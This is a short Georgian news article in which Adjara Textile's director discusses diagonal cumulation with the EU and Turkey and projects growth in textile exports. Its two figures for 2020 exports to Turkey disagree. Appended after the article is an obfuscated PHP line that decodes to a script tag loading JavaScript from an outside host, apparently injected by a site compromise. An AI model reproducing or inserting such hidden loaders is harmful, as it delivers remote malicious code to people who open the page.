celsiusi
ავერსი საქკაბელი
“2020 წელს თურქეთში დაახლოებით 55 მილიონი დოლარის ტექსტილის პროდუქცია გავიდა. 2021 წელს ეს მაჩვენებელი გაიზრდება და 2022 წელს, შესაძლოა, 100 მლნ დოლარსაც მიაღწიოს", - ამის შესახებ "აჭარა ტექსტილის" დირექტორმა გია ლომინაძემ ე.წ. დიაგონალურ კუმულაციაზე საუბრისას “საქმიან დილაში” განაცხადა.
 
ლომინაძის თქმით, ექსპორტის ზრდის გარდა, “დიაგონალური კუმულაცია” ადგილობრივ ბაზარზე ახალ ინვესტიციებს და საწარმოებს გააჩენს.
 
“დიაგონალური კუმულაციის ამოქმედების შემდეგ საქართველოში წარმოებული პროფუქცია ევროპის ბაზარზე ყოველგვარი გადასახადის გარეშე მოხვდება. ეს ჩვენს ქვეყანაში არსებულ საწარმოებს შესაძლებლობას მისცემს, ევროპაში ექსპორტი განახორციელონ. დამკვეთებს გაუჩნდებათ სურვილი, რომ საქართველოში წარმოებული პროდუქცია შეიძინონ. ბევრი თურქული საწარმო თავისი მიმართულებას საქართველოში გადმოიტანს, რაც ქვეყანაში ინვესტიციებს და სამუშაო ადგილებს გაზრდის. შედეგად, ექსპორტის მაჩვენებლები მნიშვნელოვნად გაიზრდება”, - განმარტა ლომინაძემ.
 
ცნობისთვის, საქართველოს, ევროკავშირსა და თურქეთს შორის ე.წ. “დიაგონალური კუმულაცია” ოფიციალურად ამოქმედდა, რომლითაც თურქული ნედლეულით საქართველოში დამზადებული პროდუქციის ექსპორტი ევროკავშირის ბაზარზე თავისუფალი ვაჭრობის რეჟიმით იქნება შესაძლებელი.
 
2020 წელს, საქართველოდან თურქეთში დაახლოებით 75 მლნ. აშშ დოლარის ტექსტილის პროდუქცია გავიდა, რომლის დიდი ნაწილიც, სავარაუდოდ, შემდგომ ევროკავშირში გავიდა, ხოლო „დიაგონალური კუმულაციის“ ამოქმედების შემდეგ თავისუფალი ვაჭრობის რეჟიმით ამ პროდუქციის ექსპორტირება შესაძლებელი საქართველოდან პირდაპირ ევროკავშირში იქნება, რაც ადგილობრივი მწარმოებლებისთვის გაცილებით მომგებიანი იქნება.
971
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");